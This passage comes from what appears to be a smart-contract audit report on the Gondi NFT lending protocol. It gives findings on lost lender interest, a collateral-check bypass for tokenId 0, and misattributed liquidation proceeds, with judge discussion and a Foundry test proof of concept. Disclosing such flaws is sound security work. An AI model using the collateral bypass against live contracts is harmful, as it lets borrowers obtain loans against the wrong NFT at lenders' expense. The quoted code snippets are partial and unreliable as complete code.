            if (i != largestTrancheIdx) {
                IMultiSourceLoan.Tranche calldata thisTranche = _loan.tranche[i];
                uint256 owed = thisTranche.principalAmount + thisTranche.accruedInterest
-                   + thisTranche.principalAmount.getInterest(thisTranche.aprBps, block.timestamp - thisTranche.startTime);
+                   + thisTranche.principalAmount.getInterest(thisTranche.aprBps, loanEndTime - thisTranche.startTime);
                totalOwed += owed;
                asset.safeTransferFrom(msg.sender, thisTranche.lender, owed);

                if (getLoanManagerRegistry.isLoanManager(thisTranche.lender)) {

The change to AuctionWithBuyoutLoanLiquidator does not make sense; the interest should still be calculated using the current time, because:

  1. AuctionWithBuyoutLoanLiquidator is a user-initiated repayment and requires full payment of the amount owed, unlike a bidding auction where there is a shortfall in the amount owed. So there is no maxSeniorRepayment problem.
  2. The user has 4 days to consider MAX_TIME_FOR_MAIN_LENDER_TO_BUY = 4 days. During this time, lender has not received the payment, and should calculate the interest. Users can maliciously delay the repayment, anyway, when to repay, the repayment amount is the same.

Second Issue: LiquidationDistributor should only use loan end time if the reimbursement amount is insufficient. It makes more sense to use block.timestamp when the amount is enough. Since each Tranche has different aprBps, it would make more sense to calculate the interest at the current time and allocate the excess amount in proportion to the last owed amount excess = _proceeds - _totalOwed;.


The “lender” is missing 4 days of interest. The purchaser can postpone the purchase without loss.

AuctionWithBuyoutLoanLiquidator.sol still using block.timestamp. LiquidationDistributor.sol - repayment is first made on the basis of loan end time and if there are funds remaining. The percentage of arrears is calculated on the basis of `block.timestamp’ and the excess is distributed proportionately.

Assessed type


0xend (gondi) commented:

Agree on keeping block.timestamp in AuctionWithBuyoutLoanLiquidator.sol

I think the complexity (gas consumption) of having to use one or the other (endtime / block.timestamp) does not justify it. Ultimately, this is weighing more favorably tranches that were started earlier but the absolute delta here is quite small (and if that’s not the case, because someone started a tranche with only a few seconds to go let’s say, then whoever that was had full context on the risk of a liquidation/subsequent distribution).

0xsomeone (judge) commented:

The Warden has applied economic criticism to the revised loan buy-out mechanism by the main lender, specifying that interest accrual is missing during the window in which a main lender can buy out a loan.

I believe the criticism levied is valid and a medium risk rating is appropriate as expected lender profits are slashed without a valid safety or incentive argument.

However, this submission does not constitute a denial of the M-16 alleviation as the commit that alleviates is the following which does not include the AuctionWithBuyoutLoanLiquidator change. As such, this submission is considered a new finding.

0xend (gondi) acknowledged

Loan offer’s required collateral tokenId is not validated in some conditions, borrower can use any NFT to initiate loans

Submitted by oakcobalt

Severity: Medium


Proof of concept

When a lender generates LoanOffer, they can either specify a specific NFT tokenId, or allow a collection offer (any tokenId within the NFT collection). LoanOffer and executionData’s collateral Id match is checked in _checkValidators().

Based on code doc, a lender’s LoanOffer struct -> the collateral tokenId required:

  1. Empty validator array input -> lender want the exact tokenId match;
  2. Single validator element input && _loanOffer.validators[0].validator == address(0) -> lender accepts any token in the collection;
  3. Non-empty validator array &&_loanOffer.validators[0].validator != address(0) -> lender wants offer validators to check the offer.
|>  /// @notice Check generic offer validators for a given offer or
    ///         an exact match if no validators are given. The validators
    ///         check is performed only if tokenId is set to 0.
    ///         Having one empty validator is used for collection offers (all IDs match).
    function _checkValidators(LoanOffer calldata _loanOffer, uint256 _tokenId) private view {

Edge case: A lender wants an exact tokenId match and the tokenId is 0.

Based on the code doc, an exact match check should be performed when no validators are given. So lender’s LoanOffer will be: (1) _loanOffer.nftCollateralTokenId =0 ; (2) _loanOffer.validators.length == 0;

However, _checkValidators() will not check this loanOffer at all. Due to an empty validator array is provided, exact tokenId match is not checked due to vulnerable check if (_loanOffer.nftCollateralTokenId != 0){.... In the else branch, for-loop will be directly skipped, and exit the function with no checks.

    function _checkValidators(LoanOffer calldata _loanOffer, uint256 _tokenId) private view {
       uint256 offerTokenId = _loanOffer.nftCollateralTokenId;
        //@audit This is vulnerable check condition, will cause tokenId=0 and empty validators to be skipped entirely
 |>     if (_loanOffer.nftCollateralTokenId != 0) {
            if (offerTokenId != _tokenId) {
                revert InvalidCollateralIdError();
        } else {
            uint256 totalValidators = _loanOffer.validators.length;
            if (totalValidators == 0 && _tokenId != 0) {
                revert InvalidCollateralIdError();
            } else if ((totalValidators == 1) && _isZeroAddress(_loanOffer.validators[0].validator)) {
            for (uint256 i = 0; i < totalValidators;) {
                IBaseLoan.OfferValidator memory thisValidator = _loanOffer.validators[i];
                IOfferValidator(thisValidator.validator).validateOffer(_loanOffer, _tokenId, thisValidator.arguments);
                unchecked {

emitLoan() →_processOffersFromExecutionData() → validateOfferExecution()→ _checkValidators()

As a result, a borrower can use any collateral tokenId when the lender requires tokenId 0.


Refactor the if control flow in _checkValidators() to always check tokenId for exact match if empty validator array.

0xend (Gondi) disputed and commented:

Not sure I follow. If loanOffer.nftCollateralTokenId = 0 and there are not validators, then we check if (totalValidators == 0 && _tokenId != 0) which would revert if the tokenId of the actual loan is any other than 0?

0xsomeone (judge) commented:

The Warden has demonstrated a limitation of the system when dealing with token IDs of 0 which are valid per the EIP-721 standard. I believe this is a valid issue with the codebase, and I advise the Sponsor to revisit it as the condition they mention would not revert given that _tokenId would be deliberately 0 to match a token ID of 0.

I believe a medium risk assessment is fair, as there is no documented limitation of the system’s ability to support Token IDs of 0 and any orders involving them would be incorrectly validated and effectively not be fulfilled properly.

Auction proceeds might be distributed to an incorrect queue, due to incorrect loan contract passed to _loanTermination()

Submitted by oakcobalt

Severity: Medium



Auction proceeds might be distributed to an incorrect queue, due to incorrect loan contract used in _loanTermination().

Proof of concept

Whenever a loan is closed (repaid or liquidation auction settlements) the correct loan contract (MultiSourceLoan address) where the loan is initiated needs to be passed to Pool::_loanTermination to determine the queue where the payment belongs.

In _loanTermination(), getLastLoanId[idx][_loanContract] will be used to determine the correct queue.

    function _loanTermination(
|>      address _loanContract,
        uint256 _loanId,
        uint256 _principalAmount,
        uint256 _apr,
        uint256 _interestEarned,
        uint256 _received
    ) private {
        for (i = 1; i < totalQueues;) {
            idx = (pendingIndex + i) % totalQueues;
|>          if (getLastLoanId[idx][_loanContract] >= _loanId) {

The problem is when a loan is terminated in the auction settlement flow. _loanContract can be incorrect. LiquidationDistributor::distribute() will call LoanManager(_tranche.lender).loanLiquidation() and loanLiquidation() will pass msg.sender which is LiquidationDistributor address as _loanContract to _loanTermination().

If LiquidationDistributor is not intended to be a loan contract, getLastLoanId[idx][_loanContract] will always return 0. The payment will always go to the pool instead of the correct queue.

    function loanLiquidation(
        uint256 _loanId,
        uint256 _principalAmount,
        uint256 _apr,
        uint256 _protocolFee,
        uint256 _received,
        uint256 _startTime
    ) external override {
         //@audit msg.sender is LiquidationDistributor, not a loan contract
 |>       _loanTermination(msg.sender, _loanId, _principalAmount, netApr, interestEarned, _received - fees);


  1. In LiquidationDistributor::distribute() and pool::loanLiquidation() need to pass _auction.loanAddress to be used in _loanTermination(), this will return the correct queue index.
  2. Or always ensure that LiquidationDistributor.sol is added as a loanContract.

0xsomeone (judge) commented:

The Warden claims that a loan liquidation will pass in the wrong loan contract address; however, the Pool::_loanTermination function will function as expected even if the _loanContract passed in is not a contract. This is further confirmed by the test suites of the system, inferring that this is the expected method of operation for the LiquidationDistributor contract specifically as it is never added as a loan contract. I advise the Sponsor to evaluate this submission and confirm my assumptions that the described issue is not a vulnerability but rather an expected project mechanism.

oakcobalt (warden) commented:

Please see test file here.

Added unit test testLoanLiquidationDistributionQueue(), which checks that auction payment is accounted entirely to the pool instead of the correct queue.

Replace the test file in the mitigation repo with the gist file and run forge test --match-contract LiquidationDistributorTest --match-test testLoanLiquidationDistributionQueue

 //test auction proceeds goes entirely to the pool instead of the correct queue.
    function testLoanLiquidationDistributionQueue() public {
        //Step1: Queue 0:  borrower took loan1
        _deposit(_principal * 2);
        (, IMultiSourceLoan.Loan memory loan) = _getInitialLoanWithPoolLender(
        //Step2: Queue 1: minTime passed, new queue deployed
        uint256 tokens = 1;
        uint256 minTime = _pool.getMinTimeBetweenWithdrawalQueues();

        _pool.withdraw(tokens, _user, _user);
        vm.warp(minTime + 1);

        //Step3: Queue 1: loan1 expired and liquidated by AuctionLoanLiquidator. Skip implementation here.
        //Step4: Queue 1: borrower took loan2
        collateralCollection.mint(_borrower, 2);
        collateralCollection.approve(address(_msLoan), 2);
        _getInitialLoanWithPoolLender(_borrower, 2);
        //Step5: Queue 1: loan1 auction settled, proceeds distributed to pool contract. Suppose proceeds = _principal.
        uint256 repayment = _principal;
        _asset.mint(liquidator, repayment);
       _asset.approve(address(_distributor), repayment);
        _distributor.distribute(repayment, loan);
        //check none of the deployed queues received any proceeds, proceeds are all accounted towards the pool as undeployed assets
        assertEq(_pool.getTotalReceived(0), 0);
        assertEq(_pool.getTotalReceived(1), 0);
        assertEq(_pool.getUndeployedAssets(), repayment);
Ran 1 test for test/LiquidationDistributor.t.sol:LiquidationDistributorTest
[PASS] testLoanLiquidationDistributionQueue() (gas: 2196896)
Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 8.81ms (1.04ms CPU time)

0xsomeone (judge) increased severity to Medium and commented:

After discussing with both the original Gondi judge and evaluating the PoC myself, I have concluded that the misbehavior described by the Warden does exist and should not be considered a QA flaw.

In detail, lending pool proceeds from liquidations will not be reflected in withdrawals within the pending queues, and will instead be considered undeployed capital of the pool and thus be “owned” by all non-withdrawing (i.e. active) shareholders of the pool. This is incorrect behavior as the pending withdrawal queue of the system is meant to accommodate for loan liquidations that occurred for loans created before a queue’s creation, and thus warrants an M risk rating as funds were not lost but rather misattributed.

0xend (Gondi) confirmed


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C4 audits incentivize the discovery of exploits, vulnerabilities, and bugs in smart contracts. Security researchers are rewarded at an increasing rate for finding higher-risk issues. Audit submissions are judged by a knowledgeable security researcher and solidity developer and disclosed to sponsoring developers. C4 does not conduct formal verification regarding the provided code but instead provides final verification.

C4 does not provide any guarantee or warranty regarding the security of this project. All smart contract software should be used at the sole risk and responsibility of users.